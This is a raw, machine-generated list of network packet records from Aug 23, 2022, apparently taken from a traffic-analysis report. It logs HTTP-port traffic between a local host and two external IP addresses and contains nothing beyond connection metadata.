                                                                                                                                                                      Aug 23, 2022 18:26:22.692403078 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.692441940 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.692442894 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.692454100 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.692461967 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.692471027 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.692516088 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.692540884 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.693306923 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.693336964 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.693399906 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.693414927 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.693429947 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.693433046 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.693489075 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.693510056 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.693552971 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.693569899 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.693638086 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.693666935 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.693685055 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.693686962 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.693701029 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.693727970 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.693732977 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.693738937 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.693759918 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.693773985 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.693800926 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.693804026 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.693808079 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.693821907 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.693846941 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.693851948 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.693854094 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.693871021 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.693888903 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.693906069 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.693917036 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.693922043 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.693924904 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.693939924 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.693969011 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.693973064 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.693980932 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.693989992 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.694004059 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.694026947 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.694034100 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.694045067 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.694086075 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.694092035 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.694125891 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.694154978 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.694185019 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.694204092 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.694211006 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.694214106 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.694245100 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.694272995 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.694277048 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.694286108 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.694291115 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.694292068 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.694322109 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.694351912 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.694365025 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.694365978 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.694374084 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.694402933 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.694480896 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.694586039 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.694606066 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.694622993 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.694641113 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.694658041 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.694674969 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.694689035 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.694689035 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.694724083 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.694729090 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.694773912 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.694792032 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.694802999 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.694808960 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.694840908 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.694854021 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.694884062 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.694890976 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.694931984 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.694941044 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.694947958 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.694947958 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.694993973 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.694999933 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.695010900 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.695041895 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.695084095 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.695097923 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.695111036 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.695113897 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.695168972 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.695168972 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.695174932 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.695188999 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.695200920 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.695249081 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.695261002 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.695332050 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.695367098 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.695388079 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.695400953 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.695416927 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.695427895 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.695434093 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.695452929 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.695559025 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.695578098 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.695605993 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.695630074 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.695635080 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.695646048 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.695650101 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.695661068 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.695673943 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.695703983 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.695723057 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.695734024 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.695751905 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.695758104 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.695787907 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.695799112 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.721983910 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.722021103 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.722043037 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.722059011 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.722079992 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.722083092 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.722103119 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.722120047 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.722131968 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.722192049 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.722199917 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.723103046 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.723134995 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.723156929 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.723172903 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.723181009 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.723190069 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.723216057 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.723218918 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.725480080 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.725513935 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.725533962 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.725553989 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.725553989 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.725563049 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.725575924 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.725600004 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.725615025 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.725620985 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.725637913 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.725639105 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.725658894 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.725681067 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.725701094 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.725702047 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.725706100 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.725718975 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.725748062 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.725750923 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.725773096 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.737080097 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737114906 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737137079 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737159014 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737180948 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737190962 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.737204075 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737224102 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.737226009 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737230062 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.737241030 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.737246990 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737272024 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.737282991 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.737317085 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737339973 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737360954 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737384081 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737397909 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.737411022 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.737416983 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737437963 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737449884 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.737457991 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.737459898 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737473011 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.737482071 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737504959 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737508059 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.737525940 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737539053 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.737546921 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737548113 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.737570047 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737590075 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.737591982 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737612963 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737631083 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.737634897 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737638950 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.737657070 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737679005 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737689018 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.737695932 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.737700939 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737705946 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.737711906 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.737723112 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737745047 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737756968 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.737765074 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.737766027 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737775087 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.737787962 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737797022 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.737811089 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737819910 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.737833977 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737849951 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.737857103 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737859011 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.737869978 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.737878084 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737900019 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737900972 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.737922907 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737931967 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.737946033 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737967014 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.737968922 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.737979889 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.737989902 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.737989902 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.738008976 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.738013983 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.738035917 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.738035917 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.738056898 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.738059044 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.738074064 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.738079071 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.738101006 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.738101006 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.738116980 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.738122940 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.738145113 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.738167048 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.738183022 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.738189936 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.738193035 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.738197088 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.738212109 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.738220930 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.738234043 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.738253117 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.738255024 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.738276005 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.738276958 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.738281965 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.738286972 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.738298893 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.738322020 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.738331079 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.738342047 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.738347054 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.738369942 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.738390923 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.738404989 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.738411903 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.738411903 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.738429070 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.738434076 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.738435030 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.738439083 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.738455057 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.738476038 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.738492012 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.738496065 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.738511086 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.738518000 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.738539934 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.738539934 CEST4983380192.168.2.677.91.103.222
